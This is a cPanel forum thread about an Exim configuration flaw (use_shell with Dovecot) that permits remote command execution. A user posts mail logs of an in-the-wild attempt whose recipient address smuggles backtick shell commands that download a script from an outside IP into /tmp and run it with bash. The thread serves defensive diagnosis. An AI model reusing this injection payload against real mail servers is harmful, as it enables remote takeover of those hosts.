Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Exim with Dovecot: Typical Misconfiguration Leads to Remote Command Execution

Discussion in 'E-mail Discussion' started by Domenico, May 5, 2013.

  1. Domenico

    Domenico Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    373
    Likes Received:
    1
    Trophy Points:
    318
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #1 Domenico, May 5, 2013
    Last edited: May 5, 2013
  2. cPanelNick

    cPanelNick Administrator
    Staff Member

    Joined:
    Mar 9, 2015
    Messages:
    3,483
    Likes Received:
    31
    Trophy Points:
    158
    cPanel Access Level:
    DataCenter Provider
    We don't use use_shell in exim.conf. The deficiencies of use_shell are already documented in the exim documentation showing this is a security problem when used this way. This is a case of blindly copying the example and not reading the docs that go along with it. It looks like the exim devs has since made the warning stronger and more fiercely worded.
     
  3. zye

    zye Well-Known Member

    Joined:
    Dec 6, 2002
    Messages:
    114
    Likes Received:
    4
    Trophy Points:
    168
    i noticed
    <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com>

    exim_mainlog

    Code:
    2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 08:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 14:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-05 23:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 08:39:39 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-06 17:39:33 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 01:40:27 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (110): Connection timed out
    2013-05-07 10:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.com> R=dkim_lookuphost T=dkim_remote_smtp defer (111): Connection refused
    
    exim_mainlog:2013-05-05 04:39:03 1UYgRb-0003y5-7t example.com [2001:500:88:200::10] Network is unreachable
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t example.com [192.0.43.10] Connection timed out
    exim_mainlog:2013-05-05 04:39:24 1UYgRb-0003y5-7t == red`wget${ifs}178.218.211.118/a${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`team@example.com <red`wget${IFS}178.218.211.118/a${IFS}-O${IFS}/tmp/a.pl``bash${IFS}/tmp/a.pl`team@example.co
     
  4. cPanelNick

    cPanelNick Administrator
    Staff Member

    Joined:
    Mar 9, 2015
    Messages:
    3,483
    Likes Received:
    31
    Trophy Points:
    158
    cPanel Access Level:
    DataCenter Provider
    Looks like its out in the wild now. From the old it looks quite unsuccessful.
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice